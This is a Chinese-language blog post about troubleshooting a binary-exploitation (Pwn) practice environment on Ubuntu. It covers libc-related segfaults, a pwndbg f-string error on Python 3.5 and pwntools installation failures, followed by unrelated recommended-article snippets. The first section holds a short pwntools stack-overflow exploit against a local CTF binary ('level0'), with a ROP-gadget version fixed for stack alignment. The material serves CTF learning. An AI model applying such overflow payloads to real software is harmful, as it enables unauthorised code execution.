搭建Ubuntu16.04系统下Pwn环境的几个疑难问题

已于 2022-04-11 09:27:22 修改
阅读量7.6k 收藏 31
点赞数 8
文章标签: 安全 网络安全
于 2022-04-10 15:09:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/124078132
版权

文章目录


  之前搭建了一下 Ubuntu 系统下的 Pwn 环境,但是搭建过程中遇到很多问题,有些顺手可以解决。还有一部分花费了很长时间,在此记录。
  搭建过程:
   搭建Ubuntu16.04系统下的Pwn环境及问题解决实践

1. 使用通用exp执行不能getshell(stopped with exit code -11 (SIGSEGV))

  前情提要:
  我本来是有一套 Kali 的做题环境的,执行 exp 什么的都正常,后来重新搭了一套 Ubuntu20.04 的环境。工具什么的都可以正常安装,但是发现之前能用的 exp 都执行不了了,执行起来会报错并且不能getshell了。
  以攻防世界Pwn题目“level0”为例,EXP如下:

from pwn import *

sh = process("./291721f42a044f50a2aead748d539df0")
sh.recv()
payload=0x88*'a'+p64(0x400596)
sh.sendline(payload)
sh.interactive()

  报错如下:

[+] Starting local process './291721f42a044f50a2aead748d539df0': pid 3975
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ ls
[*] Process './291721f42a044f50a2aead748d539df0' stopped with exit code -11 (SIGSEGV) (pid 3975)
[*] Got EOF while sending in interactive

在这里插入图片描述

  当时以为是 Ubuntu 版本太高,导致系统 libc 版本过高,不能正常执行,所以打算换一个版本低一些的 Ubuntu,结果试了好多版本都不能正常执行。。
  然后我的思路是将系统的 libc 版本换掉,或者指定运行时加载的 libc 文件,但是貌似不太行。
  因为我之前的 Kali 系统,EXP都是可以正常执行的,看了一下 libc 版本。

在这里插入图片描述
然后安装glibc-all-in_one
git clone https://github.com/matrix1001/glibc-all-in-one
安装后进入目录先./update_list更新一下,然后cat list可以查看支持的libc版本,cat old_list查看老版本,然后./download {libc版本}就可以下载对应libc版本了,我这里下载的是2.28-0ubuntu1_amd64

这里尝试了以下几种方法改变运行时的libc文件,但是都没啥效果,还是运行报错了。

1. patchelf

命令行使用patchelf命令。
patchelf --set-interpreter //home/pwn/Downloads/glibc-all-in-one/libs/2.28-0ubuntu1_amd64/libc-2.28.so ./291721f42a044f50a2aead748d539df0
patchelf --replace-needed libc.so.6 /home/pwn/Downloads/glibc-all-in-one/libs/2.28-0ubuntu1_amd64/ld-2.28.so ./291721f42a044f50a2aead748d539df0
patchelf --set-rpath /home/pwn/Downloads/glibc-all-in-one/libs/2.28-0ubuntu1_amd64/ ./291721f42a044f50a2aead748d539df0

但是我改完以后使用ldd查看报错了,运行也不行。

2. process的env参数

在Python脚本中
sh = process(["./291721f42a044f50a2aead748d539df0"], env={"LD_PRELOAD":"./libc-2.28.so"})指定libc。

经过尝试也不太行。

3. pwn_debug

安装:
git clone https://github.com/ray-cp/pwn_debug.git
cd pwn_debug
sudo python setup.py install

可以在Python脚本中指定加载的libc。debug模式和local模式二选一即可,debug模式的参数可以指定libc版本,local模式参数直接写libc地址即可。但我没有成功。。。

from pwn_debug import *

pdbg=pwn_debug("binary")

# debug模式
pdbg.debug("2.23")
p=pdbg.run("debug")

# local模式
gdbp.local("./libc.so.6","ld.so")
p=pdbg.run("local")

p.interactive()

最后经过分析,造成无法getshell的原因是因为libc版本不同,导致进入system函数后的栈结构遭到改变,不能满足system函数对于栈平衡的条件,从而导致了触发段错误。

我们在进入system函数之前下断点,可以看到汇编指令如下:

在我之前可以正常打EXP的Kali机器上:

在这里插入图片描述

可以看到 do_system 函数直接对 ebp 寄存器进行入栈。

而在我新搭建的 Ubuntu 环境上:

在这里插入图片描述
可以看到 do_system 函数的前几句是:

push r13
mov ecx, 0x10
push r12

然后才开始将 rbp 入栈。这也是导致栈不平衡的原因。

因此对于此问题的简单解决方法如下:

ROPgadget --binary ./291721f42a044f50a2aead748d539df0 --only 'pop|ret'

在这里插入图片描述
最终的EXP修改如下:

from pwn import *

sh = process("./291721f42a044f50a2aead748d539df0")
sh.recv()
payload=0x88*'a'+p64(0x40065c)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0x400596)
sh.sendline(payload)
sh.interactive()

运行成功:

在这里插入图片描述

2. 安装pwndbg后启动gdb报错(raise argparse.ArgumentError(banner_arg, f"banner can not be ‘{banner}’"))

具体报错内容如下:
在这里插入图片描述

Traceback (most recent call last):
  File "/home/pwn/Downloads/pwndbg/gdbinit.py", line 24, in <module>
    import pwndbg # isort:skip
  File "/home/pwn/Downloads/pwndbg/pwndbg/__init__.py", line 21, in <module>
    import pwndbg.commands.context
  File "/home/pwn/Downloads/pwndbg/pwndbg/commands/context.py", line 141
    raise argparse.ArgumentError(banner_arg, f"banner can not be '{banner}'")
                                                                           ^
SyntaxError: invalid syntax

这个问题也纠结了好长时间。

网上有的文章说是要安装32位运行库,我试了不行。
怀疑是gdb的版本,重装了gdb也不行。

最蛋疼的是我的这个报错在网上根本搜不到。。

我看很多文章写的 pwndbg 要求的是 Python3.5,所以一直也都没有怀疑Python的版本。
注:我的pwntools环境用的是Python2,但是安装pwndbg是要求Python3环境的。

后来实在没办法,跟着报错去查源码。
发现报错的源码是在contextoutput函数内,一个抛出异常的语句,并且用了格式化字符串。

def contextoutput(section, path, clearing, banner="both", width=None):
    if banner not in ('both', 'top', 'bottom', 'none'):
        # raise banner
        raise argparse.ArgumentError(banner_arg, f"banner can not be '{banner}'")

根据报错内容,我在物理机写了同样的一段逻辑然后运行,发现正常啊。
然后查看对比了 Python 版本,正常运行的是3.7.2,虚拟机上是3.5.2,然后翻了 Python 的官方文档,发现 Python 是在3.6之后才支持的f-string语法。

我懒得再升级 Python 版本了,系统的自带的这个 Python 最好不要轻易卸载,不然很麻烦。

因为我报错的这个语句只是一个异常处理的分支,正常情况来说是不会走到这里的,所以理论上来说直接注释掉就可以。运行报错是因为当前版本的编译器不认识这种语法,所以大概修改一下,保存重新运行就行了。
在这里插入图片描述

def contextoutput(section, path, clearing, banner="both", width=None):
    if banner not in ('both', 'top', 'bottom', 'none'):
        raise argparse.ArgumentError(banner_arg, "banner can not be '" + banner + "'")
        # raise argparse.ArgumentError(banner_arg, f"banner can not be '{banner}'")

保存然后重新运行 gdb,成功启动pwndbg。

在这里插入图片描述

3. 安装pwntools报错(Building wheel for capstone (setup.py) … error)

我在使用部分 Ubuntu 版本,在安装pwntools时出现,忘了截图了,可以看下报错,有的是因为没有安装make命令。

sudo apt-get install make

安装一下就行了。

有的是因为没有安装Capstone反汇编框架。

git clone https://github.com/aquynh/capstone
cd capstone
make
make install

经尝试也可以使用

pip install python-capstone

2ha0yuk7on.
关注
  • 8
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Ubuntu 16.04 for pwn
大风C9的专栏
08-15 6263
我的ubuntu 16.04配置,主要用于pwn
ubuntu 16.04系统完美解决pip不能升级的问题
09-15
主要介绍了ubuntu 16.04系统完美解决pip不能升级的问题 ,本文图文并茂给大家介绍的非常详细,需要的朋友可以参考下
关于栈溢出的栈迁移到bss段执行rop报错的问题
JackBoy的博客
11-14 656
把栈迁移到bss段后执行pop rdi jmp system 报 stopped with exit code -11 (SIGSEGV) 有个很猥琐的细节问题,读入的数据最好在栈的下方,不然即使执行到了最后一步也会报错
ubuntu16.04 pip安装pwntools等模块报错
Hesye的博客
09-26 731
前言 因为最近拓展pwn这个方向 老师用的也恰巧是ubuntu16.04。不过好在我自己用过ubuntu18和20,吸收比较快。 其次就是最重要的pwntools库。 18和20安装都没啥事,16因为结束维护了可能落下风了。 正文 系统装完先换源后更新,然后开始搞环境。 换源就稍微提下。。百度一大堆的东西。这边采用图形化换源,网上有命令行用表达式换的,太高端我不会。 因为我系统使用英文,所以右上角齿轮点击后,打开system settings 找到 选择这个,打开点other,然后左边列表往上滑找到c开
搭建Ubuntu16.04系统下的Pwn环境及问题解决实践
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-04 6917
0.前言   最近准备再重新搭建一下Pwn环境,之前我的环境搭建在Kali里面的(版本是2019.1amd64的),安装pwndbg的时候有点问题,所以当时使用的gdb插件是peda,但是感觉没有pwndbg好用,有些提示不太全,而且有些pwndbg提供的小工具也没有。   最要命的是某一次Vmware Tools自动更新之后突然不能从物理机复制文件了,拖拽文件也不行,剪贴板也不共享了。重装了几次Vmware Tools也没用,十分生气。听说Ubuntupwntools的支持是最好的,看到大佬们的pwn
Ubuntu16.04安装部署pwn调试环境
aptx4869_li的博客
10-23 1179
Ubuntu16.04安装部署pwn调试环境
ubuntu 22.04安装pwndbg报错‘Read timed out’
m0_59885476的博客
03-03 581
本质就是将pip的源更改到国内的源,但是我修改.pip/pip.config文件还是无法成功换源,所以只能修改安装脚本了。将pwndbg目录下的setup.sh的151~155行修改为下面的代码。:修改setup.sh。
Ubuntu16.04系统配置.net core环境
10-21
Ubuntu 16.04系统中配置.NET Core环境是一个重要的步骤,对于开发者来说,它允许在Linux平台上开发和运行基于.NET Core的应用程序。本文将详细介绍如何在Ubuntu 16.04上设置这个环境,特别针对那些习惯于Windows...
Ubuntu16.04环境搭建FTP服务器的教程
09-14
Ubuntu 16.04环境搭建FTP服务器是一项常见的任务,尤其对于系统管理员和技术人员来说。FTP(File Transfer Protocol)是一种用于在网络上进行文件传输的标准协议,它允许用户上传、下载和管理远程服务器上的文件...
ubuntu16.04 搭建APM编译环境源码
03-12
ubuntu16.04 搭建APM编译环境,带源码
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo python setup.py install # or python setup.py install --user 用调试符号编译glibc 编译特定版本。 # ./build.sh $(version) ./build.sh 2.23 编译所有版本(无参数表示全部编译) # ./build.sh ./build.sh 正常使用 from pwn_debug import * ## step 1 pdbg=pwn_debug("binary")
PWN题写出exp拿不到权限 Got EOF while sending in interactive
weixin_43723991的博客
03-08 3716
PWN题写出exp拿不到权限 上次在写一道十分简单的pwn题时,写完exp执行时,出现了 Got EOF while sending in interactive 当时以为是这个pwn题程序本身的问题,后来发现是自己的payload写错了。 没有拿到权限,所以用ls查看文件无效,直接退出 以后再出现这样的问题的时候,就可以知道是自己的e...
pwntools、pip、pwndbg安装方法及遇到问题解决汇总
qq_43613772的博客
07-23 9761
1、首先介绍pwntools,安装好Ubuntu后准备安装tools却发现虚拟机的安装tools选项变为灰色无法点击。首先可以尝试一下重启虚拟机,多试几次。如果还不行的话那就是安装镜像的问题,可以在虚拟机设置里面选择设置选择使用物理驱动器即可。 如下图所示: 无任何问题之后首先进行下载tools工具,点击虚拟机安装虚拟机tools即可 然后打开终端输入命令进行配置,命令如下: 在命令行输入: ...
蒸米一步一步学ROP复现失败出现Got EOF while reading in interactive
温和的跳跃
02-05 1852
可以看看自己pwn和python还有构造的payloads是不是版本不一致 我自己的是因为安装的是python3版本的pwn然后复现错误。建议python2 python2版本的pwntools 原文payloads都是python2 一切的时间刚刚好
Got EOF while reading in interactive
weixin_52296042的博客
10-01 1521
你做错了
Pwn 学习 question_5_plus_x64 ret2csu
MrTreebook的博客
05-01 350
Pwn 学习 question_5_plus_x64 ret2csu1.源代码2.源代码分析3._libc_csu_init 分析4.ROP编程5.ropper看以下gadget6.exp[点击跳转 libc database search](https://libc.blukat.me/)7.看一下效果所有源代码和程序以及调试程序都放在了gitee 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h>
绝对详细的babyheap_0ctf_2017题解
xieyichensss的博客
04-24 996
这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
Ubuntu16.04配置根文件系统
goldbr的博客
03-09 2573
交叉编译器:gcc-linaro4.9.4 编译器路径:/usr/local/arm/gcc-linaro-4.9.4-2017.01-x86_64_arm-linux-gnueabihf/bin nfs挂载路径:/home/arjun/linux/nfs/ubunturootfs 客户端地址:192.168.8.60 服务器地址:192.168.8.57 硬件主芯片:imx6ull存储:...
double[] pwnData = {1, 0, 1, 0, 1, 1, 0, 0, 1, 0}; //PwN信号数据double upEdgeTime = 0; //上升沿位置double downEdgeTime = 0; //下降沿位置for (int i = 1; i < pwnData.Count(); i++){ if (pwnData[i] > pwnData[i - 1]) { upEdgeTime = i; //记录上升沿位置 } else if (pwnData[i] < pwnData[i - 1]) { downEdgeTime = i; //记录下降沿位置 break; //找到第一个下降沿位置,退出循环 }}double riseDelayTime = downEdgeTime - upEdgeTime; //计算上升延时间Console.WriteLine("PwN上升延时间为:" + riseDelayTime);
最新发布
06-03
这段代码应该可以计算出PWM信号的上升沿延时时间,但是有一些需要注意的地方: 1. 变量 `upEdgeTime` 和 `downEdgeTime` 的初始值应该设置为无效值,比如-1,以便在循环中可以判断是否已经找到上升沿和下降沿位置。 2. 在找到第一个下降沿位置后,应该退出循环,以免继续寻找其他下降沿位置。 3. 计算上升沿延时时间时,应该使用下降沿位置减去上升沿位置,而不是上升沿位置减去下降沿位置。 以下是修正后的代码: ```csharp double[] pwnData = {1, 0, 1, 0, 1, 1, 0, 0, 1, 0}; // PWM信号数据 double upEdgeTime = -1; // 上升沿位置 double downEdgeTime = -1; // 下降沿位置 for (int i = 1; i < pwnData.Count(); i++) { if (pwnData[i] > pwnData[i - 1]) { upEdgeTime = i; // 记录上升沿位置 } else if (pwnData[i] < pwnData[i - 1]) { downEdgeTime = i; // 记录下降沿位置 break; // 找到第一个下降沿位置,退出循环 } } if (upEdgeTime != -1 && downEdgeTime != -1) { double riseDelayTime = downEdgeTime - upEdgeTime; // 计算上升延时时间 Console.WriteLine("PWM上升延时时间为:" + riseDelayTime); } else { Console.WriteLine("未找到有效的上升沿和下降沿位置!"); } ``` 希望这可以帮助您!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值